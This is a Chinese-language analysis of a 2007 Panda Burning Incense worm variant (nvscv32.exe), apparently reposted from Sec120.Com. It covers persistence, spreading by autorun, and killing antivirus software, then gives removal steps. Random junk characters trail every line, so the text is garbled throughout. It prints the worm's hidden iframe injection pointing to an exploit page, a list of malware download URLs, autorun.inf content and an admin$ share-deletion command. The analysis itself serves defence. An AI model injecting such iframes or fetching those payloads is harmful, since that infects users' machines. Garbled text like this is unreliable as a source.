熊猫烧香最新变种分析及查杀方法

文件名称：nvscv32.exe =D].`  
.jU Z  
病毒名称：目前各杀毒软件无法查杀（已经将病毒样本上报各杀毒厂商） `@|w>8bMz{  
Ib1e#M3  
中文名称：（尼姆亚，熊猫烧香） n>P!u71  
@rO4y`  
病毒大小：68,570 字节 < A?<N?%o  
J3G7zu8  
编写语言：Borland Delphi 6.0 - 7.0 Wt J{  
t8&q9$  
加壳方式：FSG 2.0 -> bart/xt I]X  
8.?E[~  
发现时间：2007.1.16 ?U_9{}r  
Zn&k[?;Al  
危害等级：高 ^mg*;8eGa  
}E;F)=E  
一、病毒描述： S$eDnw~$  
"!H@k%eAM|  
含有病毒体的文件被运行后，病毒将自身拷贝至系统目录，同时修改注册表将自身设置为开机启动项，并遍历各个驱动器，将自身写入磁盘根目录下，增加一个 Autorun.inf文件，使得用户打开该盘时激活病毒体。随后病毒体开一个线程进行本地文件感染，并对局域网其他电脑进行扫描，同时开另外一个线程连接某网站下载木马程序进行发动恶意攻击。 bC~~5Cm  
{B0h+. C  
二：中毒现象： ;LRW 8Wd  
$b>}C= gt  
1：在系统每个分区根目录下存在setup.exe和autorun.inf文件（A和B盘不感染）。 ioV_oR9I  
dn,gZ"<  
2：无法手工修改“文件夹选项”将隐藏文件显示出来。 kX[fy7rVt  
~O: U|&  
3：在每个感染后的文件夹中可见Desktop_ini的隐藏文件，内容为感染日期 如：2007-1-16 '# z]M  
]` ]g@v  
4：电脑上的所有脚本文件中加入以下代码：<iframe src=http://www.krvkr.com/worm.htm width=”0” height=”0”></iframe> Rg* J}  
\cQ .|S  
5:中毒后的机器上常见的反病毒软件及防火墙无法正常开启及运行。 \ZD[!w7  
3]U]?h  
6：不能正常使用任务管理器，SREng.exe等工具。 F98i*K`"  
Y)XvlfJ,h?  
7：无故的向外发包，连接局域网中其他机器。 Pl+xH%U+?  
j'GtgT  
三：技术分析 n.hElgkUOr  
0xpx(T[  
1：病毒文件运行后,将自身复制到%SystemRoot%\system32\drivers\nvscv32.exe 7zDiHac  
0mexF@  
建立注册表自启动项: :?CQuEv-  
NQ9Ojj{#  
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\] :gI.l1  
:Q@)*kQH  
nvscv32: "C:\WINDOWS\system32\drivers\nvscv32.exe" 0oU=RbC  
;/LD)$_  
2：查找反病毒窗体病毒结束相关进程: X=
~V6m  
s_eOcm  
天网防火墙 0JY WrPR  
zgKY4R{V  
virusscan v27Ja .tA  
iOqk*EL_r\  
symantec antivirus t`|,6qEG  
I,O#X)O|i  
system safety monitor Cca0](R*&  
(/h5zCc/v  
system repair engineer :b/jNHJU  
[@"wd_f{l  
wrapped gift killer H4<Nnd\   
*P2[qhP2  
游戏木马检测大师 Qw)9r{f  
K:r\{#9  
超级巡警 ~ 3T,&?r  
{6 .o=EyM{  
3：结束以下进程: kzO&
24  
ULBg{e?l8  
mcshield.exe A6UO0lyu  
7m1KR#j  
vstskmgr.exe ijUzC>O+q  
RT*5d;l0  
naprdmgr.exe !.Zt[g}  
w'ybbv{c  
updaterui.exe UUtbD&\  
G&9#*<F$c  
tbmon.exe \ijMw  
?o[L7JI  
scan32.exe %_gho  
BC/_:n8O  
ravmond.exe 1n%8j*bJq  
)\0F7Z  
ccenter.exe 9dKul,c  
8SmjZpQ?  
ravtask.exe SR7j\1a/2A  
Xm_$ dZ  
rav.exe /-Qv?"  
RiFw?Q+  
ravmon.exe l]#!+@  
fCX*R"  
ravmond.exe 7_\Mwy{P  
Y=B3q8l5  
ravstub.exe yA7)Y})>  
9$l>\.6  
kvxp.kxp 4$"D
baC  
/"#4T^7&  
kvmonxp.kxp `
2%6V)s  
$3P`DJo  
kvcenter.kxp 4j'd3WGpbN  
w|Aqqe  
kvsrvxp.exe BWq/TG=>  
.BZVX=x  
kregex.exe d*]Ew=^L  
yTAvF\s$(  
uihost.exe $H2GbZ-I  
d53 L6
5[  
trojdie.kxp Q/^A #l[  
pP/@  
frogagent.exe &Cro2|KZhG  
2(#Ks's?  
kvxp.kxp >bm|%Ou"  
@h9MxCE!  
kvmonxp.kxp j, u#K)7{T  
jNl/!l7B  
kvcenter.kxp /Jlv"R1,  
&a)vdlZSE=  
kvsrvxp.exe "S!3m9_#  
G$JFuz)|  
kregex.exe e>H:/24  
TMj4w,g4  
uihost.exe kDsIp=  
q&si%  
trojdie.kxp X>l*v\F9  
"'tRfB  
frogagent.exe mh`|=M]8E  
j4.&l3  
logo1_.exe ;5S}~+j  
SBfFZw)  
logo_1.exe zICI_*~  
9`Q@'(m  
rundl132.exe =!.mGW-Q}  
g1[&c+=U`P  
taskmgr.exe SS3-+<z  
;u-4KK  
msconfig.exe .b>TK  
%|IUqjg  
regedit.exe M7dU@Ag  
SgM.B  
sreng.exe sa#.l% #  
4：禁用下列服务: *e4TSqC|  
NoDZ5Z  
schedule aW;aA'!  
_%pAlo_6  
sharedaccess I$jvXl=$  
>)#c\{c  
rsccenter FjKq%.=#  
_m'ysCjA  
rsravmon ,0?!ov|  
>L>+2z  
rsccenter 1/iE`Si  
bXdY\&fE  
kvwsc m4/er539T  
Pv){sYUh  
kvsrvxp _<Dt z  
PZOKrW  
kvwsc v 81rfB5  
WH$HI/%*m  
kvsrvxp ^Kq|ID AP  
;e{5)@h$  
kavsvc ef
]B9J~h  
!: us!s  
avp K0fv( !r{  
;u!?QSvb  
avp b1^cD6sT+  
|4>:M\h  
kavsvc 8T5k-HwE  
{B{i(6C(  
mcafeeframework 2$0)?ZC?=  
Zf:]Gq1  
mcshield A,XfD}+:Z  

|B[eJq  
mctaskmanager xFb3O|TC  
N}QFGX  
mcafeeframework L.)yXuo4  
bkv/I{C>?  
mcshield `,#!C`E 9  
+{-]P\oc  
mctaskmanager ExrY>*v  
4rp6 C/i  
navapsvc ^.HWkS`e  
Gp|JU Fo  
wscsvc ;z>p8N  
=,:K)  
kpfwsvc Bc ^4 T1  
{bkGYx5.C  
sndsrvc (!</%^ZI  
buYDl  
ccproxy Ay$>(;  
<GfVMD  
ccevtmgr 5gK~('9'?1  
Y5%;p33uFG  
ccsetmgr *cNk>y  
'
JZ_  
spbbcsvc r{ @
`o@q  
KH}t:m+h  
symantec core lc YFvgz.>QE  
vLn> 4SK  
npfmntor ScJu_Af  
hqW$kw  
mskservice r)
B3es&&  
/'&v4C^y>  
firesvc h48 bb.p2  
fM:80bnL+  
5：删除下列注册表项: WZ*&@|w  
4ftj>O  
software\microsoft\windows\currentversion\run\ravtask V9{B}5KC  
sU%"azc  
software\microsoft\windows\currentversion\run\kvmonxp AM/lbMr  
\+]O*Bm&`8  
software\microsoft\windows\currentversion\run\kav /(zB0TEd  
/Ynt<S9"  
software\microsoft\windows\currentversion\run\kavpersonal50 OqEHM%j  
P>W8V+l![  
software\microsoft\windows\currentversion\run\mcafeeupdaterui { _X#f
q0}  
.v l="<  
software\microsoft\windows\currentversion\run\network associates error reporting service 8S=c^_PJ  
`~E<Sf<M  
software\microsoft\windows\currentversion\run\shstatexe %zQ2:iT5@=  
%kW3hQ<$  
software\microsoft\windows\currentversion\run\ylive.exe V8v,jS$l4  
:BDviUC7Z  
software\microsoft\windows\currentversion\run\yassistse k4mTZ}6E  
]+,nA R  
6：感染所有可执行文件，并将图标改成（这次不是熊猫烧香那个图标了） in?T]}  
hDbHSZ  
7：跳过下列目录: ,O9`X6rh'  
=U_@zDD@V  
windows d<?X3&J  
~ i'C/[P  
winnt !Iko0#4i  
U]mO7HK  
systemvolumeinformation 2w7@u/OC'  
L]NYYP-  
recycled 't ;/,+:V  
q8tug=c  
windowsnt Nc:U4  
eo]a'J9(  
windowsupdate U)b&zZc;  
6d(b'S^  
windowsmediaplayer 98ayA$  
 l58l  
outlookexpress -%N}A3m!5  
MIJ%_=sm4:  
netmeeting i&5!9m`Cw  
|:/ @t  
commonfiles *<;&>w8  
'9Qd.q7s|b  
complusapplications B~e7w 4  
ur`}v|ZY  
commonfiles 81cv:|"  
Z#[>N,P  
messenger +Hi{/{k0N  
iiQ||P}5  
installshieldinstallationinformation W *|OOa'  
P[6dTZ!\s  
msn <vO8_2,V-  
,at-ci\'  
microsoftfrontpage b^;N>zx  
jCam,$oE  
moviemaker }% FDm@+  
8UlB~fVg  
msngaminzone 7Im}~3NJG  
FC~|&  
8：删除*.gho备份文件. WJBW:2=;  
z
ww?  
9：在所有驱动器根目录建立自身文件副本setup.exe,建立autorun.inf文件使病毒自动运行,设置文件属性为隐藏、只读、系统. 1h&)I%`?  
~rQ4n9G  
autorun.inf内容： av7q>NEZ!1  
%y!  
程序代码 'aLPTVM^  
k-;.0!D^  
[AutoRun] 
AW]("pt  
+D6-m  
OPEN=setup.exe t=AE7  
k?z [hZg0  
shellexecute=setup.exe (0O`A~M3  
K7n;Zb:BR  
shell\Auto\command=setup.exe n">?LN-DC  
tP/GDC;  
10：删除共享：cmd.exe /c net share admin$ /del /y FA<Z37:  
_+0uju?o}  
11：在机器上所有脚本文件中加入<iframe src=http://www.krvkr.com/worm.htm width=”0” height=”0”></iframe>，此代码地址是一个利用MS-06014漏洞攻击的网页木马，一旦用户浏览中此病毒的服务器上的网页，如果系统没有打补丁，就会下载执行此病毒。 1nw$B[  
~Q3WBOjn  
12：扫描局域网机器，一旦发现漏洞，就迅速传播。  m,xy4  
13：在后台访问http://www.whboy.net/update/wormcn.txt，根据下载列表下载其他病毒。 e_;%F`  
}39M_4a&  
目前下载列表如下： 6:8EZ'y  
7H/!rx  
http://www.krvkr.com/down/cq.exe 0Ax>gj-`  
)1X' W  
http://www.krvkr.com/down/mh.exe Q-H=wJ4R  
Qu,)wfp~  
http://www.krvkr.com/down/my.exe ?Xy w<fMQ  
*q\HFI  
http://www.krvkr.com/down/wl.exe iT)2 ?I6!  
)dUd`g  
http://www.krvkr.com/down/rx.exe *m `KU+o-u  
a3DoLq"/  
http://www.krvkr.com/down/wow.exe S5YDS|K  
:y<Cd[/  
http://www.krvkr.com/down/zt.exe FE^?U%:u@  
WVBE>TB  
http://www.krvkr.com/down/wm.exe VO\S>kw  
P:bVcta9g  
http://www.krvkr.com/down/dj.exe "!w[U{  
&@
`H^8  
http://www.krvkr.com/cn/iechajian.exe ^mQ;CMV  
h|$zHm  
到此病毒行为分析完毕。 )dzjz%B)  
^5^ zo~^o  
四：Sec120.Com专家解决方案： [hvig$L  
k;AV;KWI'  
1：关闭网络共享，断开网络。 c@"i?  
kW7&~tX  
2：使用IceSword结束掉nvscv32.exe进程（速度要快，抢在病毒感染IceSword前） x1 R!  
2={K-s20  
3:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL CheckedValue的数值改为1 v/4X[6(  
#Fb0;H9`  
4：删除注册表启动项 H/
B^N,oi  
?U2g8D nFY  
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\] >cU*D:  
cZ7F1H~  
nvscv32: "C:\WINDOWS\system32\drivers\nvscv32.exe" &].1[&M]  
0B!mEg  
5：删除C:\WINDOWS\system32\drivers\nvscv32.exe t9=|* =;9)  
cl9;2D"Zm!  
6：删除每个盘根目录下的autorun.inf文件和setup.exe文件，利用搜索功能，将Desktop_.ini全部删除。 BLYk <m  
d/-0B<ts  
7：如果电脑上有脚本文件，将病毒代码全部删除。 XV0<pV>  
uDMUy"8&!  
8：关闭系统的自动播放功能。 GoZJDE3  
}lQn]q
 
这样就基本上将病毒清除了